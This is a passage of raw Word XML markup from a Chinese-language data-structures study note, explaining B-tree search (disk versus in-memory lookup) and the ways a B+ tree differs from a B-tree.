          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所指的子树中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）同样，顺指针找到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> *g</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>节点，在该节点找到关键字</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>47,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查找成功。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>从查找算法中可以看出，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">B- </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>树中进行查找包含两种基本操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( 1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">B- </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>树中查找结点；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ( 2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>在结点中查找关键字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="390" w:lineRule="atLeast"/>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 w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">B- </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>树通常存储在磁盘上，则前一查找操作是在磁盘上进行的，而后一查找操作是在内存中进行的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>即在磁盘上找到指针</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>所指结点后，先将结点中的信息读入内存，然后再利用顺序查找或折半查找查询等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">K </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的关键字。显然，在磁盘上进行一次查找比在内存中进行一次查找的时间消耗多得多</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="00D24CFB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(3) B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>树</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D24CFB" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="00D70D1A">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="360"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树是应文件系统所需而产生的一种</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>变形树</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。一棵</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">m </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>阶的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">m </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>阶的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>B-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>树的差异在于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC02DB" w:rsidP="00D24CFB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>棵子树的结点中含有</w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个关键码；</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>关键码的个数与子树的个数相同</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC02DB" w:rsidP="00D24CFB">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:leftChars="200" w:left="420" w:firstLineChars="171" w:firstLine="359"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">B </w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所有的</w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>叶子结点中包含了全部关键码</w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的信息，及指向含有这些关键码记录的指针，且叶子结点本身依关键码的大小自小而大的顺序链接。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="00DC02DB" w:rsidP="00D24CFB">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="359"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所有的</w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>非终端结点可以看成是索引部分</w:t>
      </w:r>
      <w:r w:rsidR="008B62F9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，结点中仅含有其子树根结点中最大（或最小）关键码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如图一棵</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>阶的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>树</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B62F9" w:rsidRPr="00F41A4C" w:rsidRDefault="008B62F9" w:rsidP="008B62F9">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
